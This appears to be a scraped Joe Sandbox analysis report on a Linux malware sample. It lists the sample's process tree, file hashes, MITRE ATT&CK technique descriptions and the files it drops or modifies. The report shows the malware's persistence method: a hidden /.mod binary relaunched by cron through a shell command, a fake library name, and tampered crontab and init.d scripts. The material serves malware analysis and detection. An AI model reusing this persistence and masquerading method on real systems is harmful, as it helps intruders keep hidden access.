File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: System.mod PID: 5787, Parent PID: 1

General

Start time (UTC):	03:00:31
Start date (UTC):	02/11/2024
Path:	/boot/System.mod
Arguments:	/boot/System.mod
File size:	2011136 bytes
MD5 hash:	e55a695d2530b3fb5c80256f6036de29

Chronological Activities

Analysis Process: System.mod PID: 5802, Parent PID: 5787

General

Start time (UTC):	03:00:31
Start date (UTC):	02/11/2024
Path:	/boot/System.mod
Arguments:	-
File size:	2011136 bytes
MD5 hash:	e55a695d2530b3fb5c80256f6036de29

Chronological Activities

Analysis Process: System.mod PID: 5802, Parent PID: 5787

General

Start time (UTC):	03:00:31
Start date (UTC):	02/11/2024
Path:	/boot/System.mod
Arguments:	/boot/System.mod
File size:	2011136 bytes
MD5 hash:	e55a695d2530b3fb5c80256f6036de29

Chronological Activities

Analysis Process: systemd PID: 5807, Parent PID: 1

General

Start time (UTC):	03:00:31
Start date (UTC):	02/11/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: System.mod PID: 5807, Parent PID: 1

General

Start time (UTC):	03:00:31
Start date (UTC):	02/11/2024
Path:	/boot/System.mod
Arguments:	/boot/System.mod
File size:	2011136 bytes
MD5 hash:	e55a695d2530b3fb5c80256f6036de29

Chronological Activities

Analysis Process: System.mod PID: 5811, Parent PID: 5807

General

Start time (UTC):	03:00:31
Start date (UTC):	02/11/2024
Path:	/boot/System.mod
Arguments:	-
File size:	2011136 bytes
MD5 hash:	e55a695d2530b3fb5c80256f6036de29

Chronological Activities

Analysis Process: System.mod PID: 5811, Parent PID: 5807

General

Start time (UTC):	03:00:31
Start date (UTC):	02/11/2024
Path:	/boot/System.mod
Arguments:	/boot/System.mod
File size:	2011136 bytes
MD5 hash:	e55a695d2530b3fb5c80256f6036de29

Chronological Activities

Analysis Process: udisksd PID: 5839, Parent PID: 803

General

Start time (UTC):	03:00:33
Start date (UTC):	02/11/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Chronological Activities

Analysis Process: dumpe2fs PID: 5839, Parent PID: 803

General

Start time (UTC):	03:00:33
Start date (UTC):	02/11/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Chronological Activities

Analysis Process: systemd PID: 5871, Parent PID: 1

General

Start time (UTC):	03:00:36
Start date (UTC):	02/11/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: cron PID: 5871, Parent PID: 1

General

Start time (UTC):	03:00:36
Start date (UTC):	02/11/2024
Path:	/usr/sbin/cron
Arguments:	/usr/sbin/cron -f
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 5916, Parent PID: 5871

General

Start time (UTC):	03:01:01
Start date (UTC):	02/11/2024
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 5925, Parent PID: 5916

General

Start time (UTC):	03:01:01
Start date (UTC):	02/11/2024
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: sh PID: 5925, Parent PID: 5916

General

Start time (UTC):	03:01:01
Start date (UTC):	02/11/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "/.mod "
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5926, Parent PID: 5925

General

Start time (UTC):	03:01:01
Start date (UTC):	02/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: .mod PID: 5926, Parent PID: 5925

General

Start time (UTC):	03:01:01
Start date (UTC):	02/11/2024
Path:	/.mod
Arguments:	/.mod
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: .mod PID: 5927, Parent PID: 5926

General

Start time (UTC):	03:01:01
Start date (UTC):	02/11/2024
Path:	/.mod
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: libgdi.so.0.8.1 PID: 5927, Parent PID: 5926

General

Start time (UTC):	03:01:01
Start date (UTC):	02/11/2024
Path:	/usr/lib/libgdi.so.0.8.1
Arguments:	/usr/lib/libgdi.so.0.8.1
File size:	2011136 bytes
MD5 hash:	e55a695d2530b3fb5c80256f6036de29

Chronological Activities

Analysis Process: libgdi.so.0.8.1 PID: 5931, Parent PID: 5927

General

Start time (UTC):	03:01:01
Start date (UTC):	02/11/2024
Path:	/usr/lib/libgdi.so.0.8.1
Arguments:	-
File size:	2011136 bytes
MD5 hash:	e55a695d2530b3fb5c80256f6036de29

Chronological Activities

Analysis Process: libgdi.so.0.8.1 PID: 5931, Parent PID: 5927

General

Start time (UTC):	03:01:01
Start date (UTC):	02/11/2024
Path:	/usr/lib/libgdi.so.0.8.1
Arguments:	/usr/lib/libgdi.so.0.8.1
File size:	2011136 bytes
MD5 hash:	e55a695d2530b3fb5c80256f6036de29

Chronological Activities

Analysis Process: systemd PID: 5948, Parent PID: 1

General

Start time (UTC):	03:01:02
Start date (UTC):	02/11/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: cron PID: 5948, Parent PID: 1

General

Start time (UTC):	03:01:02
Start date (UTC):	02/11/2024
Path:	/usr/sbin/cron
Arguments:	/usr/sbin/cron -f
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 5991, Parent PID: 5948

General

Start time (UTC):	03:02:01
Start date (UTC):	02/11/2024
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 6000, Parent PID: 5991

General

Start time (UTC):	03:02:01
Start date (UTC):	02/11/2024
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: sh PID: 6000, Parent PID: 5991

General

Start time (UTC):	03:02:01
Start date (UTC):	02/11/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "/.mod "
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6001, Parent PID: 6000

General

Start time (UTC):	03:02:01
Start date (UTC):	02/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: .mod PID: 6001, Parent PID: 6000

General

Start time (UTC):	03:02:01
Start date (UTC):	02/11/2024
Path:	/.mod
Arguments:	/.mod
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: .mod PID: 6002, Parent PID: 6001

General

Start time (UTC):	03:02:01
Start date (UTC):	02/11/2024
Path:	/.mod
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: libgdi.so.0.8.1 PID: 6002, Parent PID: 6001

General

Start time (UTC):	03:02:01
Start date (UTC):	02/11/2024
Path:	/usr/lib/libgdi.so.0.8.1
Arguments:	/usr/lib/libgdi.so.0.8.1
File size:	2011136 bytes
MD5 hash:	e55a695d2530b3fb5c80256f6036de29

Chronological Activities

Analysis Process: libgdi.so.0.8.1 PID: 6006, Parent PID: 6002

General

Start time (UTC):	03:02:01
Start date (UTC):	02/11/2024
Path:	/usr/lib/libgdi.so.0.8.1
Arguments:	-
File size:	2011136 bytes
MD5 hash:	e55a695d2530b3fb5c80256f6036de29

Chronological Activities

Analysis Process: libgdi.so.0.8.1 PID: 6006, Parent PID: 6002

General

Start time (UTC):	03:02:01
Start date (UTC):	02/11/2024
Path:	/usr/lib/libgdi.so.0.8.1
Arguments:	/usr/lib/libgdi.so.0.8.1
File size:	2011136 bytes
MD5 hash:	e55a695d2530b3fb5c80256f6036de29

Chronological Activities

Analysis Process: systemd PID: 6029, Parent PID: 1

General

Start time (UTC):	03:02:01
Start date (UTC):	02/11/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: cron PID: 6029, Parent PID: 1

General

Start time (UTC):	03:02:01
Start date (UTC):	02/11/2024
Path:	/usr/sbin/cron
Arguments:	/usr/sbin/cron -f
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shell s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system ( `/etc` ) and the user’s home directory ( `~/` ) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.
Tactics:	Defense Evasion
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Creation, File: File Metadata, File: File Modification, Firmware: Firmware Modification, Process: OS API Execution, Process: Process Creation, Script: Script Execution, Service: Service Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.
Tactics:	Impact
Data Sources:	File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report fL4E1jNVCt.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/.mod

/etc/.walk

/etc/32676

/etc/crontab

/etc/init.d/acpid

/etc/init.d/alsa-utils

/etc/init.d/anacron

/etc/init.d/apparmor

/etc/init.d/apport

/etc/init.d/avahi-daemon

/etc/init.d/binfmt-support

/etc/init.d/bluetooth

/etc/init.d/console-setup.sh

/etc/init.d/cron

/etc/init.d/cryptdisks

/etc/init.d/cryptdisks-early

/etc/init.d/cups

/etc/init.d/cups-browsed

/etc/init.d/dbus

/etc/init.d/gdm3

/etc/init.d/hddtemp

/etc/init.d/hwclock.sh

/etc/init.d/irqbalance

/etc/init.d/iscsid

/etc/init.d/keyboard-setup.sh

/etc/init.d/kmod

/etc/init.d/lightdm

/etc/init.d/lm-sensors

/etc/init.d/lvm2-lvmpolld

/etc/init.d/mono-xsp4

/etc/init.d/multipath-tools

/etc/init.d/open-iscsi

Linux Analysis Report
fL4E1jNVCt.elf